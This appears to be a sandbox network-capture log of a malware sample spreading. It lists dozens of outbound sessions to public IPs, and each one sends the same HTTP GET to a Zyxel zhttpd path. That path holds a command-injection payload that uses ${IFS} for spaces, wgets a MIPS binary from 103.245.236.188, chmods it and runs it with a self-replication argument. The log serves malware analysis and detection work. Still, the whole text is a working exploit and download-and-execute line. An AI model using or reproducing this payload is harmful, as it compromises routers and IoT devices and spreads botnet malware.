                                                Jan 12, 2024 18:24:01.354460955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                329192.168.2.133423642.68.56.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354516029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                330192.168.2.135782234.140.8.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354563951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                331192.168.2.1344190209.38.7.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354650021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                332192.168.2.1351540112.215.216.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354721069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                333192.168.2.1333630201.101.244.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354746103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                334192.168.2.134234242.205.97.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354780912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                335192.168.2.135697849.70.126.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354830027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                336192.168.2.134490491.227.190.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354918957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                337192.168.2.1334442211.118.138.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.354979992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                338192.168.2.1344436200.116.143.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.355035067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                339192.168.2.134030691.215.172.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.355138063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                340192.168.2.1341888207.18.36.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:01.355184078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                341192.168.2.1353482184.32.61.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:02.362587929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                342192.168.2.134491494.181.232.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:02.362709045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                343192.168.2.133834299.84.101.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:03.367337942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                344192.168.2.1337112207.187.121.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:03.367413044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                345192.168.2.1340040192.229.182.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:03.367440939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                346192.168.2.1353378119.190.107.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:03.367469072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                347192.168.2.134114247.37.20.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371153116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                348192.168.2.1357702203.233.160.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371186972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                349192.168.2.1339028107.58.213.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371203899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                350192.168.2.134559052.70.119.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371239901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                351192.168.2.13510005.200.180.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371293068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                352192.168.2.133882290.163.150.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371330023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                353192.168.2.1345860107.202.146.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371351004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                354192.168.2.134789669.233.114.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371474981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                355192.168.2.1346532153.120.220.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371522903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                356192.168.2.1360772223.106.127.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:04.371565104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                357192.168.2.1359144135.189.180.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:05.375871897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                358192.168.2.134771895.209.28.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:05.375926971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                359192.168.2.134751223.255.67.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:05.375967026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                360192.168.2.1355648181.129.77.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:05.376000881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                361192.168.2.1341974145.70.68.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:06.381484032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                362192.168.2.1335818145.128.214.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:06.381522894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                363192.168.2.1339932151.149.131.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386117935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                364192.168.2.1343242223.205.16.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386167049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                365192.168.2.1355104202.247.252.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386192083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                366192.168.2.134749041.203.237.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386231899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                367192.168.2.1334376140.10.67.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386337996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                368192.168.2.133513673.178.244.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386380911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                369192.168.2.1349524145.246.222.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:07.386429071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                370192.168.2.1346140114.42.239.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:08.391448021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                371192.168.2.1360480153.15.164.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:08.391486883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                372192.168.2.1348794200.96.7.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:09.395967960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                373192.168.2.135882884.154.163.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:11.406194925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                374192.168.2.133409299.206.134.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:11.406275034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                375192.168.2.1356512221.178.45.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:11.406331062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                376192.168.2.1335670173.11.81.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:12.412419081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                377192.168.2.134911281.210.89.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:13.416506052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                378192.168.2.1336764199.9.248.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:13.416536093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                379192.168.2.1336950156.140.41.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:13.416666985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                380192.168.2.133300875.144.52.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:14.420490026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                381192.168.2.1358178111.171.126.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:14.420519114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                382192.168.2.135164027.62.227.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:14.420571089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                383192.168.2.135391213.246.252.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:14.420667887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                384192.168.2.1338532113.30.107.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:14.420680046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                385192.168.2.134061053.168.179.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:15.426069975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                386192.168.2.1348088178.179.104.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:15.426120043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                387192.168.2.133428465.198.209.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:15.426165104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                388192.168.2.1343962119.94.160.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:16.431421041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                389192.168.2.133481864.57.170.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:16.431457043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                390192.168.2.1345114180.39.61.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:16.431488037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                391192.168.2.1356056197.63.184.241443
                                                TimestampBytes transferredDirectionData
